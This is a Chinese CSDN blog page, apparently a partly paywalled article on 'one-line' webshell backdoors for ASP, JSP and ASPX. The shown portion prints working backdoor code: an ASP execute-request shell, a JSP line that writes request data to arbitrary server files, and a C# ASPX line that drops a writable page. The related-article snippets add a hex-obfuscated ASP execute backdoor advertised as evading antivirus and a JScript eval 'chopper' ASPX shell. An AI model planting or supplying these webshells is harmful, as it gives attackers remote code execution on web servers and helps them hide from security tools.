ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX

最新推荐文章于 2024-04-22 11:26:46 发布
VIP文章 最新推荐文章于 2024-04-22 11:26:46 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 脚本——Asp 文章标签: .net 语言 microsoft 脚本 asp html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiwish/article/details/1728833
版权
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-
首先回顾一下以前ASP一句话的经典木马吧!

<%if request("nonamed")<>"" then execute request("nonamed")%>

VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....

然后解析语言终究发展成为中间代码例如java .net 动态执行也就不存在了!

之前ASP中正常情况只支持VBS JSCRIPT(像python perlscript 这些特例的我就不说了)...

如今ASPX中 所支持的VBS的高级版本VB已经不存在execute这个独有的方法....真遗憾....

同时Jscript 也一样转向高级版本Jscript.net 但是我们需要的eval函数还是生存下来的!script child有幸了...

先埋下一个伏笔吧~ 先谈谈如今的中间语言WEB应用中的一句话

JSP :<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%> 这个是我自己写的 要弹要说,都是大家的 呵呵!我不发言.....

ASPX: <%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow =new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write (Request.Params["l"]);ow.Close()%>这个不知道是谁的作品,感觉性质有点像我的JSP一句话了!不过还是把简单的shell实现了!支持ing....

两个一句话大体都一样 调用类把 接收的都写到文件!简单说就是对文件写操作而已!~昔日ASP 一句话的光辉 如今在中间语言的后门中给限制得荡然无存~~错
最低0.47元/天 解锁文章
hiwish
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed]  Execute(HextoStr(“65786563757465287265717565737428636872283335292929”))  Function HextoStr(data)  HextoStr=”EXECUTE “””””  C=”&CHR(&H”  N=”)”  Do While Len(data)>1  If IsNumeric(Left(data,1)) Then  HextoStr=HextoStr&C&Left(data,2)&N  data=Mid
Python中range函数有什么作用?
oldboyedu1的博客
05-04 750
在Python中,内置函数有:abs、pow、array、int、sum、str、float、range等。例如range(0,5)是[0,1,2,3,4]没有5。例如range(5)等价于range(0,5)例如range(0,5)等价于range(0,5,1)>>>range(1,11) #从1开始到11。>>>range(0,30,5) #步长为5。>>>range(0,10,3) #步长为3。>>>range(0,-10,-1) #负数。>>>range(10) #从0开始到10。
execute request("value")
Sunny
04-01 2557
http://hi.baidu.com/aoooog/blog/item/cb5e7c5406b7ba5c564e008d.html转这篇文章只是希望大家能够防御好,因为我的站点就是被这个东西害的对方首先上传图片木马,然后上传木马后门,直接在他的本地操作我的文件。与asp网站的安全性2008-10-18 12:07在ASP里有一句语句意思是执行省略号里的语句.那么如果我写进我们精心构造
c++构造函数中抛出异常的用途和用法
hjjdebug的专栏
01-18 4218
该实例用来帮助理解在构造函数中抛出异常的用途和用法。 它有三个文件构成,关键点处都给出了注释。 test.h, test.cpp,main.cpp $ cat test.h #ifndef __MYTEST_BASE #define __MYTEST_BASE #include using namespace std; class Component { public: Comp
一句话木马ASPX篇
weixin_42478365的博客
08-06 8827
一句话木马ASPX篇 aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Fo
ASPX一句话***--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
weixin_34366546的博客
08-09 606
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:本文章首发[url]http://blog.csdn.net/kj021320/archive/2007/08/04/1726442.aspx[/url],后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。首先回顾一下以前ASP一句话的经典***吧! <...
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 591
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
webshell 一句话木马
无痕的博客
01-12 2823
一句话木马
webshell和一句话木马
qq_61346813的博客
07-23 2704
Webshell和一句话木马
execute-js:JavaScript 的应用程序工作流执行器
05-30
目录特征接受工作流作为JSON对象通过同步或异步 JavaScript 函数为每个步骤定义操作接受一个测试和条件,每个条件都是一个子工作流(另一个执行树) 无限嵌套级别依次执行步骤以并发模式执行步骤每个级别的最大并发...
Android-ExecuteShell是一个可以方便的执行shell命令的Android开源库
08-13
ExecuteShell 是一个可以让你在你的 Android 项目上方便快速使用 shell 指令的开源库
ipfs-execute:使用Bubblewrap和IPFS的纯容器
02-02
ipfs-execute:使用Bubblewrap和IPFS的纯容器
The MySQL server is running with the --read-only option so it cannot execute this statement
09-08
1209 - The MySQL server is running with the --read-only option so it cannot execute this statement
Rx.Net 第三章 linq介绍
weixin_43542114的博客
04-16 320
匿名类型简化了查询,因为它提供了类型的内联创建,您可以使用这些类型来存储查询结果,这些结果应该只在一个范围内可见。您可以使用LINQ进行过滤集合的简单查询,以及涉及将两个集合连接在一起的更复杂的查询。在c#中,您使用方法链技术来构建特定于领域的语言(dsl)来表达您所编程的领域。LINQ使查询集合变得超级简单,它的抽象允许对不同的底层存储库执行相同的查询。延迟执行允许您创建在使用查询结果时执行的查询,而不是在创建查询时执行。要完成方法链接,使用流畅的接口和扩展方法。
RX.Net 第二章 hello Word
weixin_43542114的博客
04-16 408
要在应用程序中正确使用Rx并使用所有丰富的操作符,您需要学习它们以及将它们组合在一起的技术,这就是本书的全部内容。本章提供了一个简单而强大的例子,你可能在过去做过(或者将来可能会做),并以两种方式解决它:传统的事件风格和Rx风格的事件处理流。您可以在任何类型的应用程序中使用Rx WPF桌面客户端,asp.net网站或简单的控制台应用程序等。Rx提供了许多查询操作符,例如使用Where操作符进行过滤,使用Select操作符进行转换等等。在下一章中,你将学习函数式的思维方式,它与。大多数情况下,您将安装系统。
Elasticsearch .NET 客户端的演变
Elastic 中国社区官方博客
04-16 968
.NET 世界中,与 Elasticsearch 的集成长期以来一直由 NEST 库提供支持,该库作为开发人员与 Elasticsearch 强大的搜索和分析功能进行交互的强大接口。NEST 是出于对 Elasticsearch 本地 .NET 客户端的需求而诞生的,由于其丰富的功能集和无缝的集成能力,很快就受到了开发人员的欢迎。在的近 14 年时间里,NEST 一直忠实地跟踪 Elasticsearch 的发布。
C# .NET 中的反应式系统
2401_82584055的博客
04-16 1535
概述:反应式系统已成为构建健壮、可扩展和响应迅速的应用程序的强大范式。这些系统被设计为更具弹性、弹性和消息驱动性,确保它们在各种条件下保持响应,包括高负载、网络延迟和故障。在本文中,我们将探讨 .NET 生态系统中反应式系统的概念,利用 (Rx.NET) 和 来说明一个复杂的用例:用于实时监控和分析股票市场数据的实时仪表板。Reactive ExtensionsActor model (Akka.NET)了解反应式系统反应式系统旨在对事件、负载、故障甚至用户做出反应。
Spire.PDF for .NET【文档操作】演示:更改 PDF 版本
最新发布
励志做最业余的专业博主,控件产品可以私我~
04-22 610
本文将演示如何使用Spire.PDF for .NET以编程方式在不同版本之间转换 PDF。
Java基础入门day33
zpz2001的专栏
04-16 562
Java基础入门
uname -a |grep -q aarch64 &&echo aarch64
04-04
As an AI language model, I am unable to execute commands on a specific machine. However, the command "uname -a |grep -q aarch64" is used to check if the current system architecture is aarch64 or not. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值